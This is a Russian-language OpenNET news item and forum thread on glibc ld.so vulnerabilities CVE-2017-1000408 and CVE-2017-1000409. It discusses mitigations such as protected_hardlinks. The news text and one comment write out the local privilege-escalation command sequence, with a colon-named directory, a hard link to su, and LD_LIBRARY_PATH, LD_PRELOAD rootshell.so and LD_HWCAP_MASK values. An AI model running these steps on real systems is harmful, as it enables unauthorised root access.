The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от opennews (??) on 12-Дек-17, 13:34 
Компания Qualys выявила (http://seclists.org/oss-sec/2017/q4/385) две уязвимости в системной библиотеке GNU libc. Первая проблема (CVE-2017-1000408) проявляется начиная с  glibc 2.1.1 и может привести к утечке содержимого памяти процессов через манипуляцию с переменной окружения LD_HWCAP_MASK. Вторая уязвимость (CVE-2017-1000409) затрагивает выпуски начиная с glibc 2.5 и может привести к повышению своих привилегий в системе.

Уязвимость вызвана переполнением буфера в компоновщике ld.so и может быть эксплуатирована через указание специально подобранных данных в переменной LD_LIBRARY_PATH перед запуском suid-программ.  Для эксплуатации переполнения буфера локальный атакующий должен иметь возможность создания жесткой ссылки на исполняемый SUID-файл в каталог, содержащий двоеточие в имени. Также требуется, чтобы применяемая в дистрибутиве версия ld.so передавала переменную окружения  LD_LIBRARY_PATH в функцию _dl_init_paths().

   $ mkdir -p '/var/tmp/:/lib:/usr/lib:'
   $ cd '/var/tmp/:/lib:/usr/lib:'
   $ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so'
LD_HWCAP_MASK="$(((1

Уязвимость проявляется только если не активна опция /proc/sys/fs/protected_hardlinks, которая включена по умолчанию в большинстве дистрибутивов, но отключена в настройках ванильного ядра Linux. Проблема также не проявляется в Glibc 2.26  и системах, в которых установлены патчи для устранения летней уязвимости CVE-2017-1000366 (https://www.opennet.dev/opennews/art.shtml?num=46724). Несмотря на то, что в дистрибутивах проблема CVE-2017-1000409 пока помечена (https://security-tracker.debian.org/tracker/CVE-2017-1000409) как неисправленная, в  большинстве систем она не проявляется, так как в обновлениях ещё летом были предложены патчи с устранением уязвимости CVE-2017-1000366 в Glibc, также блокирующие и нынешнюю проблему.

URL: http://seclists.org/oss-sec/2017/q4/385
Новость: http://www.opennet.dev/opennews/art.shtml?num=47722

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –5 +/
Сообщение от Аноним (??) on 12-Дек-17, 13:34 
Все на musl! Пока чуваки на чёрных вертолётах о нём не прочитали
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +4 +/
Сообщение от Аноним (??) on 12-Дек-17, 14:42 
CVE-2017-15650, CVE-2016-8859, CVE-2015-1817, CVE-2014-3484 - мы работаем над этим.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –6 +/
Сообщение от Аноним (??) on 12-Дек-17, 13:38 
Ушел пересобирать ядро
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +4 +/
Сообщение от анонисмус on 12-Дек-17, 14:26 
*дистрибутив пересобери
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

47. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Michael Shigorin email(ok) on 12-Дек-17, 20:16 
> Ушел пересобирать ядро

Ещё припарки попробуйте от непонимания.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

64. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от pavlinux (ok) on 13-Дек-17, 17:22 
> ... от непонимания.

А почитать?

> Уязвимость проявляется только если не активна опция /proc/sys/fs/protected_hardlinks,
> ...., но отключена в настройках ванильного ядра Linux.


From: Ben Hutchings <ben@decadent.org.uk>
Subject: fs: Enable link security restrictions by default
Date: Fri, 02 Nov 2012 05:32:06 +0000
Bug-Debian: https://bugs.debian.org/609455
Forwarded: not-needed

This reverts commit 561ec64ae67ef25cac8d72bb9c4bfc955edfd415
('VFS: don't do protected {sym,hard}links by default').

--- a/fs/namei.c
+++ b/fs/namei.c
@@ -651,8 +651,8 @@ static inline void put_link(struct namei
    path_put(link);
}

-int sysctl_protected_symlinks __read_mostly = 0;
-int sysctl_protected_hardlinks __read_mostly = 0;
+int sysctl_protected_symlinks __read_mostly = 1;
+int sysctl_protected_hardlinks __read_mostly = 1;


/**
  * may_follow_link - Check symlink following for unsafe situations


Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

3. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –5 +/
Сообщение от Юрий email(??) on 12-Дек-17, 13:41 
Gentoo Linux 4.11.0-pf3
glibc 2.26-r3


не фурычет уязвимость

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

46. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +1 +/
Сообщение от Аноним (??) on 12-Дек-17, 19:19 
Чучка не читатель, чукча писатель? В новости черным по белому написано:
> Проблема также не проявляется в Glibc 2.26
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

49. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +8 +/
Сообщение от Аноним (??) on 12-Дек-17, 21:08 
У него нет времени читать, он компилит же!
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

51. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Юрий email(??) on 12-Дек-17, 21:39 
Не, венду очередной раз переустанавливаю.
Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

50. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –1 +/
Сообщение от Юрий email(??) on 12-Дек-17, 21:38 
Вот почему некоторые чукчи считают что предложения читать надо до запятой?
"Проблема также не проявляется в Glibc 2.26 и системах, в которых установлены патчи для устранения летней уязвимости CVE-2017-1000366."
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

60. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Andrey Mitrofanov on 13-Дек-17, 11:23 
> Вот почему некоторые чукчи считают что предложения читать надо до запятой?
> "Проблема также не проявляется в Glibc 2.26 и системах, в которых установлены
> патчи для устранения летней уязвимости CVE-2017-1000366."

Чорд!

" Уязвимость проявляется только если не активна опция /proc/sys/fs/protected_hardlinks, которая включена по умолчанию в большинстве дистрибутивов, но отключена в настройках ванильного ядра Linux. "


# cat /proc/sys/fs/protected_hardlinks
1
# _

--Я наследный зимбабвийский сикплойт. Пожалуйста пересоберите, перезагрузите ядро и запустите мина с-под рутом!1

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

5. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +1 +/
Сообщение от Аноним (??) on 12-Дек-17, 13:53 
env: ./su: No such file or directory

:(

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +5 +/
Сообщение от Andrey Mitrofanov on 12-Дек-17, 14:23 
> env: ./su: No such file or directory
> :(

..."локальный атакующий должен иметь возможность создания жесткой ссылки на исполняемый SUID-файл в каталог, содержащий двоеточие в имени."

Делай, как я:

...:/var/tmp/:/lib:/usr/lib:$ ln $(which su) .
ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная ссылка между устройствами
...:/var/tmp/:/lib:/usr/lib:$ _


---Здравствуйте, я зимбабвийский наследный иксплойт. Пож, запустите меня рутом.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

19. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 12-Дек-17, 15:55 
> Неверная ссылка между устройствами
> Пож, запустите меня рутом.

И как тебе рут в данном случае поможет? Делай ссылку в /tmp, если он у тебя не в tmpfs, конечно.

Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

22. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +3 +/
Сообщение от Аноним (??) on 12-Дек-17, 16:14 
> если он у тебя не в tmpfs, конечно.

Расходимся, ребят. Опять мимо :(

Для справки: почти все дистрибутивы держат /tmp в tmpfs и более того, он noexec.

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

24. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –3 +/
Сообщение от Аноним (??) on 12-Дек-17, 16:47 
> почти все дистрибутивы держат /tmp в tmpfs

Далеко не все.

> более того, он noexec

А это вообще крайне редко (полагаю, что по умолчанию — вообще нигде).

В случае чего есть ещё /var/tmp. Можешь начинать рассказывать, что у тебя и /var отдельно смонтирован.

Ответить | Правка | ^ к родителю #22 | Наверх | Cообщить модератору

28. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Andrey Mitrofanov on 12-Дек-17, 17:01 
> В случае чего есть ещё /var/tmp. Можешь начинать рассказывать, что у тебя
> и /var отдельно смонтирован.

Пора /bin отдельно монтировать!!111

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

33. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –1 +/
Сообщение от Аноним (??) on 12-Дек-17, 17:09 
> Можешь начинать рассказывать, что у тебя
> и /var отдельно смонтирован.

По умолчанию даже netinstall это делает, пока не скажешь делать по другому. Хорошо, все крупные дистрибутивы это делают, в том числе Debian. Так лучше?

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

39. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +2 +/
Сообщение от Аноним (??) on 12-Дек-17, 17:36 
> Хорошо, все крупные дистрибутивы это делают, в том числе Debian. Так лучше?

Нет, не лучше. Лучше писать правду.

Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

54. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 13-Дек-17, 01:31 
Debian этого не делает и более того апт сыплет ошибками если /tmp смонтирован с noexec
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

26. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Andrey Mitrofanov on 12-Дек-17, 16:59 
>> Неверная ссылка между устройствами
>> Пож, запустите меня рутом.
> И как тебе рут в данном случае поможет? Делай ссылку в /tmp,
> если он у тебя не в tmpfs, конечно.

Не-не, мне не надо. Не надо мне помогать.

...нет, не tmpfs, но да:
ln: не удалось создать жёсткую ссылку «/tmp/su» => «/bin/su»: Неверная ссылка между устройствами

Ответить | Правка | ^ к родителю #19 | Наверх | Cообщить модератору

40. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –2 +/
Сообщение от Аноним (??) on 12-Дек-17, 17:38 
Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве с /
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

43. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +1 +/
Сообщение от Andrey Mitrofanov on 12-Дек-17, 17:43 
> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве
> с /

Красная площадь, б.!


user:~$ ln $(which su) .
ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная ссылка между устройствами
user:~$ _

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

55. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +1 +/
Сообщение от Аноним (??) on 13-Дек-17, 01:34 
>> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве
>> с /
> Красная площадь, б.!
> user:~$ ln $(which su) .
> ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная
> ссылка между устройствами
> user:~$ _

Это называет "руки из жопы". Эксплойт нормально запустить не может! Ж)

Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

59. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Andrey Mitrofanov on 13-Дек-17, 11:17 
>>> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве
>>> с /
>> Красная площадь, б.!
>> user:~$ ln $(which su) .
>> ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная
>> ссылка между устройствами
>> user:~$ _
> Это называет "руки из жопы". Эксплойт нормально запустить не может! Ж)

Да-да, конечно-конечно, только не расстраивайся так.

user@ghost:~$ mkdir -p '/czar/tmp/:/lib:/usr/lib:'
user@ghost:~$ find /czar/tmp/
/czar/tmp/
/czar/tmp/:
/czar/tmp/:/lib:
/czar/tmp/:/lib:/usr
/czar/tmp/:/lib:/usr/lib:
user@ghost:~$ cd '/czar/tmp/:/lib:/usr/lib:'
user@ghost:/czar/tmp/:/lib:/usr/lib:$ ln $(wich su) .
bash: wich: команда не найдена
ln: «.»: не допускается создавать жёсткие ссылки на каталоги
user@ghost:/czar/tmp/:/lib:/usr/lib:$ ln $(which su) .
ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Операция не позволяется
.
.
.
root@novy:/czar/tmp/:/lib:/usr/lib:# ln $(which su) .
root@novy:/czar/tmp/:/lib:/usr/lib:# _
.
.
.
user@ghost:/czar/tmp/:/lib:/usr/lib:$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
ERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded: ignored.
ERROR: ld.so: object 'rootshell.so' from LD_PRELOAD cannot be preloaded: ignored.
Password: _


Не быть мне хаксором.  Как бы вам :-P этого ни хотелось.

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

7. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –1 +/
Сообщение от Юрий email(??) on 12-Дек-17, 14:06 
Как всегда. Уязвимость, которая себя может проявить с вероятностью 0.00000001. На каком нибудь экзотическом дистрибутиве с криворуким одмином.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 12-Дек-17, 14:10 
LD_LIBRARY_PATH не игнорируется при suid?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +1 +/
Сообщение от пох on 12-Дек-17, 16:58 
сначала парсится, потом игнори...уп-с, стек слетел.

и так у нас все.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

13. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –3 +/
Сообщение от optical character recognition on 12-Дек-17, 15:05 
В systemd не пашет ;(
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

14. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +15 +/
Сообщение от Anonim (??) on 12-Дек-17, 15:09 
> В systemd не пашет ;(

В новой версии обещают сделать работоспособной.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

23. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +2 +/
Сообщение от Аноним (??) on 12-Дек-17, 16:17 
>> В systemd не пашет ;(
> В новой версии обещают сделать работоспособной.

systemd-exploitd

Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

32. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Andrey Mitrofanov on 12-Дек-17, 17:04 
>>> В systemd не пашет ;(
>> В новой версии обещают сделать работоспособной.
> systemd-exploitd

sex-ploitd.

Как в соседней микросовтовской про порчу пPокупок.

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

48. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +1 +/
Сообщение от Michael Shigorin email(ok) on 12-Дек-17, 20:18 
> В systemd не пашет ;(

Багу вешайте -- глядишь, исправят.

Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

42. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –1 +/
Сообщение от Аноним (??) on 12-Дек-17, 17:43 
Там ещё этот rootshell.so компилять... ну его
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

52. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 13-Дек-17, 00:57 
>к утечке содержимого памяти процессов через манипуляцию с переменной окружения
>переполнением буфера

c-проблемы "гениальных" программистов

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

53. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  –1 +/
Сообщение от Влад (??) on 13-Дек-17, 01:22 
SUID - зло
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

57. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 13-Дек-17, 09:14 
> SUID - зло

Так есть же linux capabilities.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

61. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Andrey Mitrofanov on 13-Дек-17, 11:25 
>> SUID - зло
> Так есть же linux capabilities.

И используются они (LD_HWCAP_MASK= наверху) во добро?

Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

62. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 13-Дек-17, 12:28 
>>> SUID - зло
>> Так есть же linux capabilities.
> И используются они (LD_HWCAP_MASK= наверху) во добро?

Да, острые ножи требуют аккуратного, вдумчивого и ответственного использования. А если нет, то сейчас либо ножи затупят, либо ножны получше сделают.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

56. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 13-Дек-17, 03:16 
В дебиане и убунте не работает нифига, там protected_hardlinks прописаны.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

58. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."  +/
Сообщение от Аноним (??) on 13-Дек-17, 10:13 
>/proc/sys/fs/protected_hardlinks

у меня в ведре нет.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру